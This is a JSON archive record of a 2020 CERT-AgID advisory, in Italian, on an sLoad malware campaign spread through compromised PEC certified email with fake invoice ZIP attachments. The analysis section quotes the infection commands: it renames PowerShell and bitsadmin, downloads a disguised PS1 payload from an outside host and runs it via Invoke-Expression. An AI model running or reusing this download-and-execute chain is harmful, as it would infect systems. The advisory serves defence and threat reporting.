{
	"id": "e253a4b9-b60a-4dd7-b623-8b16d700cca9",
	"created_at": "2026-04-06T00:18:44.178251Z",
	"updated_at": "2026-04-10T13:12:59.139906Z",
	"deleted_at": null,
	"sha1_hash": "d81b7adf63e8399c0e70bc7a7db30d323282be40",
	"title": "Campagna sLoad v.2.9.3 veicolata via PEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 122269,
	"plain_text": "Campagna sLoad v.2.9.3 veicolata via PEC\r\nArchived: 2026-04-05 23:02:00 UTC\r\n13/07/2020\r\nPEC sLoad\r\nIl Cert-AgID ha riscontrato una nuova campagna massiva di malspam veicolata tramite PEC compromesse,\r\niniziata a partire dalla tarda serata di domenica 12 luglio e terminata alle ore 02:40 circa del 13.\r\nLe vittime che, per quanto rilevato dal Cert-AgID, sembrano essere tutti utenti PEC, hanno ricevuto messaggi che\r\nfanno riferimento ad una ipotetica fattura che riporta in allegato un archivio ZIP malevolo, contenente un file VBS\r\ned un XML.\r\nScopo della campagna è quello di compromettere i target con il malware sLoad di cui si è ampiamente discusso in\r\npassato.\r\nIl file VBS, una volta eseguito, scarica da una risorsa remota un file PS1 camuffato solitamente da immagine (.png\r\no .jpg) o in altri casi da .css\r\ncmd /c copy /Z c:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe %appdata%\\zkHSkztXn.exe\r\ncmd /c copy /Z c:\\Windows\\SysWOW64\\bitsadmin.exe %appdata%\\kHSkztXn.exe\r\n%appdata%\\kHSkztXn.exe /transfer pRBpgi /download\r\nhttps://peliculadeestreno.com/libuna/02567180365/blank.png %appdata%\\blank.png\r\n%appdata%\\zkHSkztXn.exe -c \u0026{$PG=gc %appdata%\\blank.png| Out-String; Invoke-Expression $PG}\r\nCome noto, sLoad genera due file system.ini e win.ini contenenti codice offuscato ma banalmente decifrabile\r\ngrazie al decrypt PS1 presente nella cartella in cui sono stati rilasciati i due file.\r\nDal file system.ini si evince che la versione utilizzata per questa campagna è la 2.9.3\r\nhttps://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/\r\nPage 1 of 2\n\nMentre dal file win.ini è possibile ottenere i C2 contattati\r\nIndicatori di Compromissione\r\nSi riportano di seguito gli indicatori di compromissione già condivisi tramite le piattaforme CNTI e MISP di Cert-AgID, a tutela delle strutture accreditate.\r\nLink: Download IoC\r\nSource: https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/\r\nhttps://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/"
	],
	"report_names": [
		"campagna-sload-v-2-9-3-veicolata-via-pec"
	],
	"threat_actors": [],
	"ts_created_at": 1775434724,
	"ts_updated_at": 1775826779,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d81b7adf63e8399c0e70bc7a7db30d323282be40.pdf",
		"text": "https://archive.orkl.eu/d81b7adf63e8399c0e70bc7a7db30d323282be40.txt",
		"img": "https://archive.orkl.eu/d81b7adf63e8399c0e70bc7a7db30d323282be40.jpg"
	}
}